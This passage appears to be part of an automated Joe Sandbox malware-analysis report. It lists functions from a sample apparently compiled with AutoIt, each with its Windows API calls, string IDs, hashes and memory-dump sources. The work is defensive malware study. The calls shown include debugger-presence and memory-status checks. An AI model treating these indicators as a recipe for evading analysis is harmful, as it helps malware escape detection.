                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__start
                                          • String ID: pow
                                          • API String ID: 3213639722-2276729525
                                          • Opcode ID: 0e9a6a809e343a3e576b98a7430d99e2fc954301ad1a78fe3f0644f21c9dbb12
                                          • Instruction ID: f9bb4e9889ae3215ea856af48b9e51222afadd59f3abe0f9cefab0bd3f86cf17
                                          • Opcode Fuzzy Hash: 0e9a6a809e343a3e576b98a7430d99e2fc954301ad1a78fe3f0644f21c9dbb12
                                          • Instruction Fuzzy Hash: F6518065A8C20696CB257B14D9413BA3BD8EB407C4F30F95CF0D9B63E9DF308C959A86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E5E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          • Opcode ID: 0c705a103237629ae7ba233f1e0e1fa303b508dfe717039fece017e0011277ec
                                          • Instruction ID: 0e346a94bc2b67c75d30021fad6849d385f60df6463aa7d8f3a7ec1488813c65
                                          • Opcode Fuzzy Hash: 0c705a103237629ae7ba233f1e0e1fa303b508dfe717039fece017e0011277ec
                                          • Instruction Fuzzy Hash: CC511F35904206DEDF18DFA8C0816FA7BA8EF15314F246856ED91BB390D6309E86CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E5F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 00E5F2A2
                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00E5F2BB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          • Opcode ID: 7316116f2896bb166389c4025699dd7109cf37f7fafd2711b49f87fe079c5a4b
                                          • Instruction ID: 7947a6dcedf0b2a909d11ce490598b4a3831c176922d1363f96648b27449fee2
                                          • Opcode Fuzzy Hash: 7316116f2896bb166389c4025699dd7109cf37f7fafd2711b49f87fe079c5a4b
                                          • Instruction Fuzzy Hash: C85156715097489BD320AF51EC86BABBBF8FF84300F91884DF1D9611A5EB318529CB67
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper_wcslen
                                          • String ID: CALLARGARRAY
                                          • API String ID: 157775604-1150593374
                                          • Opcode ID: 6a51a14cda3d83a9150e44fd0466cd1ea2ba03c0eeb27d516854c3c49b1bc853
                                          • Instruction ID: aa31f90762ecf853725af5829bd9ab4627bae54f905d97feefe91c543d45f42f
                                          • Opcode Fuzzy Hash: 6a51a14cda3d83a9150e44fd0466cd1ea2ba03c0eeb27d516854c3c49b1bc853
                                          • Instruction Fuzzy Hash: 75417F32A002059FCB18DFA8C982DAEBBF5EF59354B14606DF515B7251D731AD82CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EBD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _wcslen.LIBCMT ref: 00EBD130
                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EBD13A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CrackInternet_wcslen
                                          • String ID: |
                                          • API String ID: 596671847-2343686810
                                          • Opcode ID: ef46ab4ea963801ed14de2f674b7167030f31a1179d0624f9095edb15f572459
                                          • Instruction ID: 9e29d86a8b50da7e2d28df3774bd56f4ca26776f58f60cb4ed09fb040e8e1ecc
                                          • Opcode Fuzzy Hash: ef46ab4ea963801ed14de2f674b7167030f31a1179d0624f9095edb15f572459
                                          • Instruction Fuzzy Hash: A3311871D01219ABCF15EFA4DC85AEFBFB9FF09344F101019E815B6162EB31AA06DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32 ref: 00ED3621
                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00ED365C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$DestroyMove
                                          • String ID: static
                                          • API String ID: 2139405536-2160076837
                                          • Opcode ID: 807c07caa2d3dbeb5fd1b7fd2075087ea70f0acd2924410163ed75121b879821
                                          • Instruction ID: bd377ffa44ca0ae24d931270e5e5e9c1b6c95a989c953e7171f96a4c0e9f34b7
                                          • Opcode Fuzzy Hash: 807c07caa2d3dbeb5fd1b7fd2075087ea70f0acd2924410163ed75121b879821
                                          • Instruction Fuzzy Hash: AA319071110604AEDB20DF38DC41EFB73A9FF48764F10A61AF9A5A7280DA31ED82D761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00ED461F
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00ED4634
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: '
                                          • API String ID: 3850602802-1997036262
                                          • Opcode ID: eaab1231e63d7d4fba61b9f057d594300d7f5743eef435ae8789e7331dd9fe24
                                          • Instruction ID: 3acbf01f238a222087ab89312cbe3ce6d97a111fefc7a8f45f4aeb2453246b23
                                          • Opcode Fuzzy Hash: eaab1231e63d7d4fba61b9f057d594300d7f5743eef435ae8789e7331dd9fe24
                                          • Instruction Fuzzy Hash: 9D3136B4A0120A9FDF14CFA9D981BDABBB5FF19304F14506AE915AB381D770E942CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00ED327C
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00ED3287
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          • Opcode ID: 97df0d6d33b01a9c9c96153b6388d6b977e2a9ba987de7522c82473feacf9526
                                          • Instruction ID: bc2a86d4a7ce17867ffd0ce45cd9b9d21114241a04bf824fa4a1e5f3cf0fd0d3
                                          • Opcode Fuzzy Hash: 97df0d6d33b01a9c9c96153b6388d6b977e2a9ba987de7522c82473feacf9526
                                          • Instruction Fuzzy Hash: B611E6717002087FEF219E64DC80EBB375BEB54368F105126F514A73A0D631DD529761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E4600E: CreateWindowExW.USER32 ref: 00E4604C
                                            • Part of subcall function 00E4600E: GetStockObject.GDI32 ref: 00E46060
                                            • Part of subcall function 00E4600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E4606A
                                          • GetWindowRect.USER32(00000000,?), ref: 00ED377A
                                          • GetSysColor.USER32 ref: 00ED3794
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                          • String ID: static
                                          • API String ID: 1983116058-2160076837
                                          • Opcode ID: 098288a9121bba36e2dc249e83ccfb15e470f3bda34828314007283d75e5178b
                                          • Instruction ID: c8cf64924c723a1720f81c760165d343c21dbfabb677c207a46dfe6e84a58cac
                                          • Opcode Fuzzy Hash: 098288a9121bba36e2dc249e83ccfb15e470f3bda34828314007283d75e5178b
                                          • Instruction Fuzzy Hash: 531156B261020AAFDF00DFB8DC46AEA7BF8FB08354F005926F955E2250E735E811DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EBCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EBCD7D
                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EBCDA6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Internet$OpenOption
                                          • String ID: <local>
                                          • API String ID: 942729171-4266983199
                                          • Opcode ID: f8b5c3d5059409741ae00ba3c945bf57dc49b9b63236e1aca839881d5b9bee53
                                          • Instruction ID: 4598f9587df83011c28640f385effd09bb292665bd3175198b70fd09f73ec428
                                          • Opcode Fuzzy Hash: f8b5c3d5059409741ae00ba3c945bf57dc49b9b63236e1aca839881d5b9bee53
                                          • Instruction Fuzzy Hash: 2A11C6792096327AD7344B668C45EE7BE6CEF527A8F60522AB149A3080D7709845D6F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowTextLengthW.USER32 ref: 00ED34AB
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00ED34BA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LengthMessageSendTextWindow
                                          • String ID: edit
                                          • API String ID: 2978978980-2167791130
                                          • Opcode ID: 5f30f6050efc630e1cdc681154858fe26a1ffcbb6b964a13a26cfb9ed1d91c91
                                          • Instruction ID: b5d35a4dbbea7d50cf90bb37105df8ee202284ede228c9b4fb240279d340c708
                                          • Opcode Fuzzy Hash: 5f30f6050efc630e1cdc681154858fe26a1ffcbb6b964a13a26cfb9ed1d91c91
                                          • Instruction Fuzzy Hash: 19118F71100208AFEF214E74EC44AEB37AAEB05778F606326F971A32D0C779DC569752
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • CharUpperBuffW.USER32(?,?), ref: 00EA6CB6
                                          • _wcslen.LIBCMT ref: 00EA6CC2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$BuffCharUpper
                                          • String ID: STOP
                                          • API String ID: 1256254125-2411985666
                                          • Opcode ID: 02c6ea1d6a59916bbb2a9829f9f87cd0bf80edd5e9b8a908e00e5e5a7ac3b149
                                          • Instruction ID: 8d8e8ae0e85dd5e8c5b6a0d360f718f22fb76c80889b6d4294fe085614bd8705
                                          • Opcode Fuzzy Hash: 02c6ea1d6a59916bbb2a9829f9f87cd0bf80edd5e9b8a908e00e5e5a7ac3b149
                                          • Instruction Fuzzy Hash: B20108326005278BCB20AFBDDC809BF73F4EF6B7647151924E462BA195EA31E900C650
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID: 3, 3, 16, 1
                                          • API String ID: 176396367-3042988571
                                          • Opcode ID: 03e3b5fb4c48b5f3f9cf5b25ad3bc8cdadcc595fe2a2c25878b18e8d38cf900e
                                          • Instruction ID: 50301d8d6cd767563261378fef792c9ca4ba072525ea2120f104ef47c695cc4c
                                          • Opcode Fuzzy Hash: 03e3b5fb4c48b5f3f9cf5b25ad3bc8cdadcc595fe2a2c25878b18e8d38cf900e
                                          • Instruction Fuzzy Hash: B4E023416847111093351275ADC1F7F56C9EFC5790710381FF5D1E1196D655CD9353A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Message
                                          • String ID: AutoIt$Error allocating memory.
                                          • API String ID: 2030045667-4017498283
                                          • Opcode ID: 6b712c490bc8019e6895d904c50199f4c6fdf4bc9479dd24c62d1483db4dfde6
                                          • Instruction ID: e02906922190620d2630f565ddb89958b4c7d4ea1802f2865b0aa297685611f9
                                          • Opcode Fuzzy Hash: 6b712c490bc8019e6895d904c50199f4c6fdf4bc9479dd24c62d1483db4dfde6
                                          • Instruction Fuzzy Hash: FEE0D8312843092AD2143754BC03F897BC4CF05FA1F201427FB48795C38AD2645096AA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E60D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E5F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00E5F7CE
                                          • IsDebuggerPresent.KERNEL32 ref: 00E60D75
                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule), ref: 00E60D84
                                          Strings
                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E60D7F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                          • API String ID: 55579361-631824599
                                          • Opcode ID: 2354b399bc05fb1f5134adaf6967352b64075e8d8517b788689fb26b5d0b1675
                                          • Instruction ID: 2cf56bbf3dc93a1ba0754b34027d93944ff84448aceecd2361d7fa20997a3d2a
                                          • Opcode Fuzzy Hash: 2354b399bc05fb1f5134adaf6967352b64075e8d8517b788689fb26b5d0b1675
                                          • Instruction Fuzzy Hash: 48E06D702007118FD320DFB9F4043427BE4EB14795F009A2EE886E6765DBB0E448CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E9D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LocalTime
                                          • String ID: %.3d$X64
                                          • API String ID: 481472006-1077770165
                                          • Opcode ID: edef71415f64599753d4925bd53ba4c4286924dd6b910c77c7402e7233677155
                                          • Instruction ID: f65e2e8403e43f9de52d53cee7b2df8aeb97dd0a3ce9ccac959c6d5a3cf928b7
                                          • Opcode Fuzzy Hash: edef71415f64599753d4925bd53ba4c4286924dd6b910c77c7402e7233677155
                                          • Instruction Fuzzy Hash: EBD06265C0D129E9CF9097D0DD459F9B3BCEB18341F60A852FD06B1090E624D54CA761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindWindowW.USER32 ref: 00ED236C
                                          • PostMessageW.USER32 ref: 00ED2373
                                            • Part of subcall function 00EAE97B: Sleep.KERNEL32 ref: 00EAE9F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: 8c604eb89821278880b7e3bb2d16ac5e445d952872d8e579169a0a261c4c9bfb
                                          • Instruction ID: fbc4acc27eb417b4e67923079191bb5cb28732ff265923e0af09d43453abc8f3
                                          • Opcode Fuzzy Hash: 8c604eb89821278880b7e3bb2d16ac5e445d952872d8e579169a0a261c4c9bfb
                                          • Instruction Fuzzy Hash: 90D0C9323823117AEA64A771AC0FFCA76589B45B50F1049167655FA1D0C9A0B805CA55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindWindowW.USER32 ref: 00ED232C
                                          • PostMessageW.USER32 ref: 00ED233F
                                            • Part of subcall function 00EAE97B: Sleep.KERNEL32 ref: 00EAE9F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
